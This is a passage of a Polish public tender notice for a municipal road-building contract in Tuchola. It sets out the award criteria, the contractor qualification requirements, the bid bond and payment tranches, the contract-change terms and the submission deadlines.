Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT STAŁEJ ORGANIZACJI RUCHU – Budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej (w zakresie nowego odcinka drogi gminnej i włączenia w drogę wojewódzką), <br/>- PROJEKT STAŁEJ ORGANIZACJI RUCHU – Budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej (w zakresie drogi gminnej),<br/>- SZCZEGÓŁOWA SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH – TOM I/III Branża Drogowa – Budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej, budową i przebudową sieci wodociągowej i budową linii kablowej oświetlenia zewnętrznego przejścia dla pieszych,<br/>Szczegółowy opis przedmiotu zamówienia zawarto w SWZ rozdz. 3 i załącznikach do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający kierować się będzie następującym kryterium:<br/>Opis kryteriów oceny Znaczenie<br/>A. cena 60%<br/>B. okres gwarancji jakości 40%<br/>Maksymalna łączna ilość punktów do uzyskania wynosi 100<br/>A/ KRYTERIUM CENY ŁĄCZNEJ BRUTTO (max. 60 pkt.) – zastosowanie będzie miał następujący wzór, wykorzystywany przy<br/>ocenie oferty:<br/>cena oferowana najniższa<br/>A = --------------------------------------------- x 100 pkt. x 60%<br/>cena oferty badanej<br/>B/ KRYTERIUM OKRESU GWARANCJI JAKOŚCI (max. 40 pkt ) – zastosowanie będzie miał następujący wzór, wykorzystywany<br/>przy ocenie oferty:<br/>okres gwarancji jakości oferty badanej<br/>w miesiącach<br/>B = ---------------------------------------------------------------------- x 100 pkt. x 40%<br/>najdłuższy okres gwarancji jakości spośród<br/>badanych ofert<br/>Minimalny okres gwarancji jakości wynosi 36 miesiące, liczony od dnia odbioru końcowego przedmiotu zamówienia.<br/>Maksymalny okres gwarancji jakości oceniany przez Zamawiającego wynosi 60 miesięcy.<br/>UWAGA!<br/>Podanie w ofercie okresu gwarancji jakości krótszego niż 36 miesiące lub brak podania okresu gwarancji w formularzu ofertowym<br/>będzie skutkować odrzuceniem oferty. W przypadku zaproponowania przez Wykonawcę okresu gwarancji jakości wynoszącego<br/>więcej niż 48 miesięcy oceniona będzie wartość 60 miesięcy.<br/>19.3. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane są punkty za powyższe kryteria. Zastosowanie<br/>będzie miał następujący wzór:<br/>P (punkty) = A + B</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na <br/> zasadach określonych w rozdz. 6 i 7 SWZ oraz spełniają warunki udziału w postępowaniu <br/> w zakresie:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny,<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości min. 500 000,00 zł,<br/>4)	zdolności technicznej lub zawodowej:<br/>A (dotyczy wykazu robót) <br/>Wykonawca wykaże, że zrealizował należycie min. jedną robotę polegającą na:<br/>- na budowie / przebudowie / drogi o dł. min. 100 mb, w technologii z betonowej kostki brukowej wraz z budową sieci kanalizacji deszczowej oraz aby dołączył do ww. wykazu min. 1 szt. referencji na wykonane roboty (warunek zostanie spełniony poprzez wykazanie ww. robót razem lub osobno)<br/>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu jeżeli przedstawi w wykazie wykonanych robót (w ostatnich 5 latach) – roboty wykonane, podając ich rodzaj, wartość, datę, miejsce wykonania i podmioty na rzecz, których roboty zostały wykonane, według wzoru stanowiącego załącznik nr 9 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót, potwierdzającym, że robota budowlana została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>B (dotyczy wykazu osób): skieruje do realizacji przedmiotowego zamówienia min. po jednej osobie z niżej wymienionych branży posiadającą uprawnienia do kierowania i nadzorowania robotami budowlanymi w zakresie odpowiadającym wymienionym niżej branżom lub posiadającą inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane wymienionych specjalności:<br/>	kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej,<br/>	kierownika robót br. sanitarnej, posiadającą uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>	kierownika robót br. elektrycznej, posiadającą uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>oraz będących członkami właściwej Izby Inżynierów Budownictwa.<br/>Wykonawca skieruje do realizacji zamówienia ww. osoby, które w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2025 r. poz. 418 z późn. zm.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831). <br/>Dopuszcza się łączenie funkcji, o których mowa powyżej, przez jedną osobę pod warunkiem, że osoba ta będzie posiadała wymagane kwalifikacje.<br/>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t. j. Dz. U. z 2025 r. poz. 418 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j.Dz. U. z 2023 r. poz. 334).<br/>8.2.Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności ,jeżeli posiadane przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.3. W celu potwierdzenia braku podstaw do wykluczenia:<br/>- oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 7 do SWZ;<br/>- oświadczenie Wykonawcy o aktualności oświadczenia składanego na podst. art. 125 ust.1.ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2024r. poz. 507 ze zm.). według wzoru stanowiącego załącznik nr 11 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający na podst. art. 274 ust. Pzp wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania, chyba że Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych tj.: <br/>a)	W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu:<br/>1)	wykaz wykonanych robót budowlanych, (przynajmniej jedna robota budowlana)<br/> wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane, według wzoru stanowiącego załącznik nr 6 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót budowlanych, potwierdzającymi, że roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami według wzoru stanowiącego załącznik nr 7;<br/>3)	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta i załączniki do ofert powinny być sporządzone i złożone zgodnie z wymaganiami określonymi w SWZ w języku<br/>polskim.<br/>10.2.Wykonawca może złożyć tylko jedną ofertę. Złożenie przez Wykonawcę więcej niż jednej<br/>oferty, spowoduje odrzucenie ofert na podstawie art. 226 ust. 1 pkt 3 ustawy Pzp.<br/>10.3. Ofertę składa się przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl.<br/>10.4. Oferta musi zostać podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub<br/>podpisemosobistym przez osobę/osoby upoważnioną/upoważnione.<br/>3) podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać<br/>„Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do<br/>transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>4) w przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej ilości<br/>plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>10.5. Ofertę składa się na formularzu ofertowym – zgodnie z załącznikiem nr 2 do SWZ.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) Pełnomocnictwo (jeżeli dotyczy) wzór pełnomocnictwa załącznik nr 8 - dla osoby podpisującej ofertę do występowania w<br/>imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58<br/>ust. 2 ustawy Prawo zamówień publicznych.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formieelektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97<br/>§ 2 ustawy z dnia 14.02.1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa<br/>nie może być uwierzytelniona przez upełnomocnionego.<br/>2) Oświadczenia wymienione w rozdziale 9 pkt 1 niniejszej SWZ tj.a) oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp -<br/>załącznik nr 3 do SWZ<br/>b) oświadczenie składane na podstawie art. 117 ust. 4 Pzp – dotyczy tylko wykonawców wspólnie ubiegających się o<br/>zamówienie, zgodnie z załącznikiem nr 10 do SWZ.<br/>c) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w pkt. 9.1) SWZ, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z załącznikiem nr 4 do SWZ.<br/>d) zobowiązanie podmiotu udostępniającego zasoby – w przypadku gdy wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania<br/>mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia, zgodnie ze wzorem stanowiącym<br/>załącznik nr 5 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3) dowód potwierdzający wniesienie wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium wskazując tytuł:<br/>„Budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi” <br/>wadium, nr postępowania ZP.271.2.24.2025.AS <br/>Zamawiający wymaga wniesienia wadium, w wysokości: 6 000,00 zł (słownie: sześć tysięcy zł<br/>00/100).<br/>15.2. Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy<br/>Zamawiającego zostanie uznany kwotą wadium przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>15.3. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:<br/>Bank Spółdzielczy w Tucholi Nr 15 8174 0004 0000 2163 2000 0005<br/>15.4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2019 r. ze zm. poz. 310, 836 i 1572).<br/>15.5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>15.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 15.4.<br/> ppkt 2)-4), Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w<br/> postaci elektronicznej, podpisany kwalifikowanym podpisem elektronicznym przez wystawcę<br/> dokumentu.<br/>15.7. W przypadku wniesienia wadium w innej formie niż w pieniądzu, z treści gwarancji i poręczeń<br/> musi wynikać bezwarunkowe, nieodwołalne i na pierwsze żądanie Zamawiającego<br/> (beneficjenta) zobowiązanie Gwaranta do zapłaty na rzecz Zamawiającego kwoty wadium<br/> w okolicznościach skutkujących zatrzymaniem wadium określonych w art. 98 ust. 6<br/> ustawy Pzp. <br/>15.8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie<br/> utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/> wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona. <br/>15.9. Zamawiający niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/> przez Wykonawcę zwraca wadium Wykonawcy:<br/>1)	który wycofał ofertę przed upływem terminu składania ofert;<br/>2)	którego oferta została odrzucona;<br/>3)	po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4)	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>15.10. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 15.9, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej.<br/>15.11. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>Szczegółowe informacje dotyczące wadium zawarto w rozdz. 15 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia<br/>umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>18.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie,<br/>o którym mowa w rozdziale 9 pkt 9.1., składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>18.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączą do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>18.4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Wynagrodzenie za przedmiot umowy będzie następowało w transzach:<br/>- I transza – płatna do 15 grudnia 2025 r. – po dokonaniu protokolarnego potwierdzenia wartości i stanu zaawansowania robót. Rozliczenie częściowe nie może przekroczyć jednak wartości 30% wartości wynagrodzenia brutto określonego w § 3 ust. 1 niniejszej umowy. <br/>- II transza – po upływie kwartału od złożenia wniosku o I transzę płatności – po dokonaniu protokolarnego potwierdzenia wartości i stanu zaawansowania prac. Rozliczenie częściowe nie może przekroczyć jednak łącznie wartości 70% wartości wynagrodzenia brutto określonego w § 3 ust. 1 niniejszej umowy. <br/>- III transza – pozostała kwota wynagrodzenia – wypłacona po zakończeniu inwestycji nastąpi po uzyskaniu przez Wykonawcę protokolarnego bezusterkowego odbioru końcowego przedmiotu umowy i złożeniu faktury końcowej w siedzibie Zamawiającego. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, określone zostały w załączniku nr 12 do SWZ.<br/>21.2. Zgodnie z załącznikiem nr 12 do SWZ – wzorem umowy, Zamawiający dopuszcza możliwość<br/>wprowadzenia zmian umowy na podstawie art. 455 ustawy Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn.<br/>zm.) w następujących przypadkach:<br/>„Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:<br/>1) W zakresie zmiany terminu wykonania:<br/>a) z powodu nie przewidzianego braku płynności finansowej u Zamawiającego,<br/>b) wystąpienia siły wyższej i innych zdarzeń nadzwyczajnych,<br/>c) z powodu ujawnienia się wad/braków/błędów w dokumentacji technicznej skutkujących niemożliwością dochowania<br/>pierwotnego terminu realizacji umowy,<br/>d) z powodu wystąpienia klęsk żywiołowych,<br/>e) w przypadku wystąpienia okoliczności niezależnych od stron, związanych z zaistnieniem warunków atmosferycznych<br/>uniemożliwiających wykonywanie robót zgodnie z ich przewidywaną technologią wykonania, także przeprowadzania prób i<br/>sprawdzeń zgodnie z technologią przewidzianą przez producentów, termin realizacji zamówienia może zostać wydłużony,<br/>f) w związku z wystąpieniem następstw działania organów administracji, które w szczególności dotyczyć będą:<br/>- przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień<br/>itp.;<br/>- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji<br/>technicznej;<br/>g) w związku z zaistnieniem uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do<br/>dokumentacji technicznej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron;<br/>h) w związku z wystąpieniem innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz od Wykonawcy<br/>skutkujących niemożliwością prowadzenia prac, w szczególności: brak możliwości dojazdu oraz transportu materiałów na<br/>plac budowy spowodowany awariami, remontami lub przebudowami dróg dojazdowych, protesty mieszkańców, przerwy w<br/>dostawie energii elektrycznej, wody, gazu;<br/>i) w związku z wystąpieniem innych przyczyn leżących po stronie Zamawiającego, które w szczególności dotyczyć będą:<br/>- nieterminowego przekazania placu budowy przez Zamawiającego;<br/>- wstrzymania robót przez Zamawiającego;<br/>- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji technicznej;<br/>- przedłużającej się procedury wyboru oferty – powyżej 30 dni;<br/>z zastrzeżeniem, że w przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej termin wykonania umowymo że ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty,<br/>nie dłużej jednak niż o okres trwania tych okoliczności;<br/>j) z uwagi na opóźnienia w dostawach materiałów i urządzeń,<br/>k) wystąpienia robót dodatkowych nie objętych przedmiotem niniejszej umowy, czego nie można było przewidzieć przy<br/>zachowaniu należytej staranności w chwili zawarcia niniejszej umowy.<br/>2) W przypadku późnego rozstrzygnięcia konkursów o dofinansowanie termin realizacji zadania ulegnie przedłużeniu.<br/>3) W zakresie płatności i innych:<br/>a) aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło<br/>niewykonaniem lub wadliwym wykonaniem projektu,<br/>b) zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,<br/>c) zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego<br/>stanu prawnego,<br/>d) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.<br/>(...)<br/>Szczegółowe informacje dotyczące zmian umowy zawarto w rozdz. 21 SWZ oraz zał. nr 12 do SWZ - wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformy zakupowej: https://platformazakupowa.pl/tuchola</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-13 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> przewidziana w art. 7 ust.1. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835) .<br/>Wymagane jest oświadczenie o niepodleganiu wykluczeniu na podst. w.w. ustawy. Zapis o niepodleganiu umieszczono w<br/>oświadczeniu<br/>składanym na podst. art.125 ust.1 ust. Pzp (zał.3, zał.4 do SWZ) oraz oświadczeniu o aktualności oświadczenia wykonawcy<br/>o niepodleganiu wykluczeniu (zał. nr 11 do SWZ). Zamawiający zawrze umowę z Wykonawcą, który złożył najkorzystniejszą<br/>ofertę w niniejszym postępowaniu.<br/>20.2. Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art. 577 ustawy Pzp, w terminie<br/>nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało<br/>przesłane przy użyciu środków komunikacji elektronicznej, albo 10 dni, jeżeli zostało przesłane w inny sposób.<br/>20.3. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt<br/>20.2, jeżeli w postępowaniu o udzielenie zamówienia w trybie podstawowym złożono tylko jedną ofertę.<br/>20.4. Wykonawca, którego oferta uznana zostanie za najkorzystniejszą, będzie zobowiązany 